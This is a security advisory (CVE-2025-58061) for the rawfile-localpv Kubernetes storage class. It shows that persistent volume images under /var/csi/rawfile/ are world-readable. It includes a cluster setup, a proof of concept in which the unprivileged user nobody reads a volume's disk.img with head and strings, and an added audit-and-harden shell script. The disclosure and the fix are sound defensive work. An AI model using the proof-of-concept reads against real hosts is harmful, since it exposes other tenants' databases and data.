
Persistent volume data is world-readable, which allows non-privileged users to access sensitive data such as the databases of k8s workloads

Moderate
tiagolobocastro published GHSA-wh95-vw4r-xwx4 Jun 19, 2025

Package

rawfile-localpv

Affected versions

< v0.9.0

Patched versions

>= v0.10.0

Description

Summary

Downstream advisory: https://github.com/canonical/k8s-snap/security/advisories/GHSA-5547-57qq-wmgw (private)

The rawfile-localpv (https://github.com/openebs/rawfile-localpv) storage class creates persistent volume data under /var/csi/rawfile/ on Kubernetes hosts by default. However, that directory and the data in it are world-readable. This allows non-privileged users (such as nobody in the following example) to read the whole persistent volume. That data can include sensitive information, such as an entire database if Kubernetes tenants run MySQL or PostgreSQL in a container, so it could lead to a database breach.

Details

$ sudo -u nobody ls -alFh /var/csi/rawfile/
total 12K
drwxr-xr-x 3 root root 4.0K Apr  8 14:46 ./
drwxr-xr-x 3 root root 4.0K Apr  8 14:30 ../
drwxr-xr-x 2 root root 4.0K Apr  8 14:46 pvc-2844d93c-540d-4ebe-a66b-ae92e54f7d53/

$ sudo -u nobody ls -alFh /var/csi/rawfile/pvc-2844d93c-540d-4ebe-a66b-ae92e54f7d53/
total 33M
drwxr-xr-x 2 root root 4.0K Apr  8 14:46 ./
drwxr-xr-x 3 root root 4.0K Apr  8 14:46 ../
-rw-r--r-- 1 root root 1.0G Apr  8 14:51 disk.img
-rw-r--r-- 1 root root  203 Apr  8 14:46 disk.meta

-> readable by an unprivileged user such as nobody

PoC

[as an admin user, set up a Kubernetes cluster as follows]

Prepare an Ubuntu 24.04 LTS VM or a clean environment.

Run the following steps to set up kubeadm + Cilium + rawfile-localpv.

## Based on https://kubernetes.io/docs/setup/production-environment/tools/kubeadm/

## containerd
sudo apt-get update
sudo apt-get install containerd -y

cat <<EOF | sudo tee /etc/sysctl.d/k8s.conf
net.ipv4.ip_forward = 1
EOF
sudo sysctl --system

sudo install -d -m 0750 /etc/containerd/
containerd config default | sudo tee /etc/containerd/config.toml
sudo sed -i \
    -e "s/\(SystemdCgroup =\) .*/\1 true/" \
    -e "s/\(sandbox_image =\) .*/\1 \"registry.k8s.io\/pause:3.10\"/" \
    /etc/containerd/config.toml
sudo systemctl restart containerd.service

## kubeadm, kubectl, kubelet
sudo apt-get install -y apt-transport-https ca-certificates curl gpg
curl -fsSL https://pkgs.k8s.io/core:/stable:/v1.32/deb/Release.key | sudo gpg --dearmor -o /etc/apt/keyrings/kubernetes-apt-keyring.gpg
echo "deb [signed-by=/etc/apt/keyrings/kubernetes-apt-keyring.gpg] https://pkgs.k8s.io/core:/stable:/v1.32/deb/ /" | sudo tee /etc/apt/sources.list.d/kubernetes.list
sudo apt-get update
sudo apt-get install -y kubelet kubeadm kubectl
sudo apt-mark hold kubelet kubeadm kubectl

sudo kubeadm init

mkdir -p $HOME/.kube
sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config
sudo chown $(id -u):$(id -g) $HOME/.kube/config

kubectl taint nodes --all node-role.kubernetes.io/control-plane-
kubectl label nodes --all node.kubernetes.io/exclude-from-external-load-balancers-

curl https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3 | bash

## Cilium
helm repo add cilium https://helm.cilium.io/
helm install cilium cilium/cilium --version 1.17.2 --namespace kube-system --set operator.replicas=1

# rawfile-localpv
git clone --depth=1 https://github.com/openebs/rawfile-localpv.git
helm install -n kube-system rawfile-csi ./rawfile-localpv/deploy/charts/rawfile-csi/

kubectl patch storageclass rawfile-localpv -p '{"metadata": {"annotations":{"storageclass.kubernetes.io/is-default-class":"true"}}}'

Create a persistent volume.

$ cat <<EOF | kubectl apply -f -
kind: PersistentVolumeClaim
apiVersion: v1
metadata:
  name: myclaim
spec:
  accessModes:
    - ReadWriteOnce
  volumeMode: Filesystem
  resources:
    requests:
      storage: 1Gi
---
kind: Pod
apiVersion: v1
metadata:
  name: storage-writer-pod
  labels:
    k8s-app: storage-writer-pod
spec:
  containers:
    - name: storage-writer-container
      image: busybox
      command:
        ["/bin/sh", "-c", "while true; do echo LOREM IPSUM $(date) | tee -a /mnt/dates; sleep 2; done"]
      volumeMounts:
        - name: storage-volume
          mountPath: "/mnt"
  restartPolicy: "Never"
  volumes:
    - name: storage-volume
      persistentVolumeClaim:
        claimName: myclaim
EOF

[as a local unprivileged user, do the following to find and read the data]

$ sudo -u nobody ls -alFh /var/csi/rawfile/
total 12K
drwxr-xr-x 3 root root 4.0K Apr  8 14:46 ./
drwxr-xr-x 3 root root 4.0K Apr  8 14:30 ../
drwxr-xr-x 2 root root 4.0K Apr  8 14:46 pvc-f5fdabe0-6caf-4a2c-aecc-3b55d75b0696/

$ sudo -u nobody file /var/csi/rawfile/pvc-f5fdabe0-6caf-4a2c-aecc-3b55d75b0696/disk.img
/var/csi/rawfile/pvc-f5fdabe0-6caf-4a2c-aecc-3b55d75b0696/disk.img: Linux rev 1.0 ext4 filesystem data, UUID=04c198cc-efb8-45be-b8e8-568b02626e87 (needs journal recovery) (extents) (64bit) (large files) (huge files)

$ sudo -u nobody qemu-img info /var/csi/rawfile/pvc-f5fdabe0-6caf-4a2c-aecc-3b55d75b0696/disk.img
image: /var/csi/rawfile/pvc-f5fdabe0-6caf-4a2c-aecc-3b55d75b0696/disk.img
file format: raw
virtual size: 1 GiB (1073741824 bytes)
disk size: 32.7 MiB
Child node '/file':
    filename: /var/csi/rawfile/pvc-f5fdabe0-6caf-4a2c-aecc-3b55d75b0696/disk.img
    protocol type: file
    file length: 1 GiB (1073741824 bytes)
    disk size: 32.7 MiB

$ sudo -u nobody head -c 500000000 /var/csi/rawfile/pvc-f5fdabe0-6caf-4a2c-aecc-3b55d75b0696/disk.img | strings | head
/mnt
lost+found
dates
LOREM IPSUM Sat Apr 5 07:50:01 UTC 2025
LOREM IPSUM Sat Apr 5 07:50:03 UTC 2025
LOREM IPSUM Sat Apr 5 07:50:05 UTC 2025
LOREM IPSUM Sat Apr 5 07:50:07 UTC 2025
LOREM IPSUM Sat Apr 5 07:50:09 UTC 2025
LOREM IPSUM Sat Apr 5 07:50:11 UTC 2025
LOREM IPSUM Sat Apr 5 07:50:13 UTC 2025

-> the contents of persistent volumes are readable and visible to an unprivileged user
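The listings above show the root cause: the PVC directories are 0755 and disk.img is 0644. As an added example (not part of the advisory or of the rawfile-localpv project), the following script audits a rawfile data directory for entries with the other-read bit set and, separately, strips group/other access from it. It assumes the node plugin accesses the images as root, as the root-owned listing on this page suggests, and uses only POSIX find and chmod.

```shell
#!/bin/sh
# Added example, not from the advisory or the rawfile-localpv project:
# audit a rawfile-localpv data directory for world-readable entries
# (the condition the advisory demonstrates) and optionally tighten them.

# Print every entry under $1 whose mode has the other-read bit set.
# Returns 0 when nothing is world-readable, 1 otherwise, 2 on bad input.
audit_world_readable() {
    root="${1:-/var/csi/rawfile}"
    [ -d "$root" ] || { echo "no such directory: $root" >&2; return 2; }
    # -perm -004: other-read bit set; matches both the pvc-* dirs
    # (drwxr-xr-x) and disk.img / disk.meta (-rw-r--r--) from the page.
    found=$(find "$root" -perm -004 -exec ls -ld {} + 2>/dev/null)
    if [ -n "$found" ]; then
        printf '%s\n' "$found"
        return 1
    fi
    return 0
}

# Remove group/other access: directories 0700, files 0600.
# Assumption: only root (the owner shown in the advisory's listing)
# needs to reach the backing images, so no other principal loses access.
harden_rawfile_dir() {
    root="${1:-/var/csi/rawfile}"
    [ -d "$root" ] || return 2
    chmod 0700 "$root" || return 1
    find "$root" -type d -exec chmod 0700 {} + || return 1
    find "$root" -type f -exec chmod 0600 {} + || return 1
    return 0
}
```

Run `audit_world_readable` on its own as a node-level check (for example from a cron job or a compliance scan) and treat a non-zero exit as a finding; the hardening step changes mode bits only and does not touch ownership.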

Impact

What kind of vulnerability is it? Who is impacted?
It requires a local unprivileged login to the Kubernetes host. But once that is the case, persistent volume data could contain sensitive information, including a database from a workload, such as a whole MySQL or PostgreSQL database.

Severity

Moderate


CVSS v3 base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE ID

CVE-2025-58061

Weaknesses

No CWEs

Credits